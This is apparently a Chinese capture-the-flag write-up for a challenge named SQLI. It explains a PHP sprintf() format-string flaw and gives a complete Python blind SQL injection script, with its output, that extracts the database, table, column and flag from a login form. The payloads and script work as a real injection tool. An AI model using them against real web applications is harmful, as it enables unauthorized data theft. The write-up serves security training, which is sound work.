• "迎圣诞,拿大奖"赛题——SQLI


    0x01

    本题所需知识清单:

    1.php sprintf()函数漏洞:https://blog.csdn.net/WQ_BCJ/article/details/85057447

    2.布尔盲注基本playload及流程:https://blog.csdn.net/WQ_BCJ/article/details/84592445

    3.Burpsuit  Intruder暴力猜解:https://blog.csdn.net/snert/article/details/49749757

    4.盲注python(2)脚本:

    #coding:utf-8
    import requests
    import string
    
    def boom():
        url = r'http://10adf3af0baf4f6389bc0eed2495da87fd5e4464bed344e9.game.ichunqiu.com/'
        s = requests.session()
        #会话对象requests.Session能够跨请求地保持某些参数,比如cookies,即在同一个Session实例发出的所有请求都保持同一个cookies,而requests模块每次会自动处理cookies,这样就很方便地处理登录时的cookies问题。
        dic = string.digits + string.letters + "!@#$%^&*()_+{}-="
        right = 'password error!'
        error = 'username error!'
        lens = 0
        i = 0
        #确定当前数据库的长度
        while True:
            payload = "admin%1$\' or " + "length(database())>" + str(i) + "#"
            data={'username':payload,'password':1}
            r = s.post(url,data=data).content
            if error in r:
                lens=i
                break
            i+=1
            pass
        print("[+]length(database()): %d" %(lens))
        #确定当前数据库的名字
        strs=''
        for i in range(lens+1):
            for c in dic:
                payload = "admin%1$\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#"
                data = {'username':payload,'password':1}
                r = s.post(url,data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
            pass
        pass
        print("[+]database():%s" %(strs))
    
        lens=0
        i = 1
        while True:
            payload = "admin%1$\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"
            #对当前的数据库,查询第一个表的长度
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if error in r:
                lens = i
                break
            i+=1
            pass
        print("[+]length(table): %d" %(lens))
    
        #查询第一个表的名称
    
        strs=''
        for i in range(lens+1):
            for c in dic:
                payload = "admin%1$\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#"
                # 数字一定要str才可以传入
                data = {'username':payload,'password':1}
                r = s.post(url,data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
            pass
        pass
        print("[+]table_name:%s" %(strs))
        tablename = '0x' + strs.encode('hex')
        #编码为16进制
        table_name = strs
    
        lens=0
        i = 0
        while True:
            payload = "admin%1$\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if error in r:
                lens = i
                break
            i+=1
            pass
        print("[+]length(column): %d" %(lens))
    
        strs=''
        for i in range(lens+1):
            for c in dic:
                payload = "admin%1$\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
                data = {'username':payload,'password':1}
                r = s.post(url,data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
            pass
        pass
        print("[+]column_name:%s" %(strs))
        column_name = strs
    
        num=0
        i = 0
        while True:
            payload = "admin%1$\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if error in r:
                num = i
                break
            i+=1
            pass
        print("[+]number(column): %d" %(num))
    
        lens=0
        i = 0
        while True:
            payload = "admin%1$\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"
            data = {'username':payload,'password':1}
            r = s.post(url,data=data).content
            if error in r:
                lens = i
                break
            i+=1
            pass
        print("[+]length(value): %d" %(lens))
    
        i=1
        strs=''
        for i in range(lens+1):
            for c in dic:
                payload = "admin%1$\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
                data = {'username':payload,'password':'1'}
                r = s.post(url,data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
            pass
        pass
        print("[+]flag:%s" %(strs))
    
    if __name__ == '__main__':
        boom()
        print 'Finish!'

    0x02解题具体流程

    #1. 根据题目SQLI可猜测本题可能为SQL注入

           

     #2.尝试弱口令当username=admin显示密码错误而不是用户名错误可知用户名为admin

          

    #3.使用普通的注入方法:https://blog.csdn.net/WQ_BCJ/article/details/85216275

         无果,可以利用burpsuit上的Intruder看那些字符没有被过滤掉,具体使用方法在上面知识清单部分

         破解结果为:对比多条length长度异常后发现%字符没有被过滤,且在respone里面发现sprintf()函数的报错(参数太少)

                               猜测可以利用sprintf()函数进行注入,下面来验证

         

    #4.输入username=admin%1$' and 1=1 # 得到的结果是username error ,换成or则显示password error,证明admin后面的or 1=1       #被执行成功了,验证成功接下来就是盲注时间了:

     

     #5.利用脚本得到flag:脚本及盲注基础知识知识清单处有详细介绍

    D:Python2.7python2.exe F:/pycharm_work/sqli/sql.py
    [+]length(database()): 3
    c
    ct
    ctf
    [+]database():ctf
    [+]length(table): 4
    f
    fl
    fla
    flag
    [+]table_name:flag
    [+]length(column): 4
    f
    fl
    fla
    flag
    [+]column_name:flag
    [+]number(column): 1
    [+]length(value): 42
    f
    fl
    fla
    flag
    flag{
    flag{b
    flag{b5
    flag{b5b
    flag{b5b3
    flag{b5b36
    flag{b5b361
    flag{b5b3612
    flag{b5b36121
    flag{b5b36121-
    flag{b5b36121-8
    flag{b5b36121-86
    flag{b5b36121-86d
    flag{b5b36121-86dd
    flag{b5b36121-86dd-
    flag{b5b36121-86dd-a
    flag{b5b36121-86dd-a4
    flag{b5b36121-86dd-a4d
    flag{b5b36121-86dd-a4db
    flag{b5b36121-86dd-a4db-
    flag{b5b36121-86dd-a4db-a
    flag{b5b36121-86dd-a4db-aa
    flag{b5b36121-86dd-a4db-aab
    flag{b5b36121-86dd-a4db-aab3
    flag{b5b36121-86dd-a4db-aab3-
    flag{b5b36121-86dd-a4db-aab3-8
    flag{b5b36121-86dd-a4db-aab3-86
    flag{b5b36121-86dd-a4db-aab3-86d
    flag{b5b36121-86dd-a4db-aab3-86dd
    flag{b5b36121-86dd-a4db-aab3-86ddb
    flag{b5b36121-86dd-a4db-aab3-86ddb7
    flag{b5b36121-86dd-a4db-aab3-86ddb74
    flag{b5b36121-86dd-a4db-aab3-86ddb749
    flag{b5b36121-86dd-a4db-aab3-86ddb749d
    flag{b5b36121-86dd-a4db-aab3-86ddb749df
    flag{b5b36121-86dd-a4db-aab3-86ddb749dfa
    flag{自个做一遍去}
    
    Finish!
    
    Process finished with exit code 0
    
  • 相关阅读:
    MySQL实现了四种通信协议
    深入了解Windows句柄到底是什么
    Linux虚拟地址空间布局以及进程栈和线程栈总结
    malloc 函数详解
    数组指针和指针数组的区别
    Linux中sudo配置
    ctrl+c,ctrl+d,ctrl+z在linux程序中意义和区别
    linux select函数详解
    linux grep命令详解
    Linux find 用法示例
  • 原文地址:https://www.cnblogs.com/qingwuyou/p/10687461.html
Copyright © 2020-2023  润新知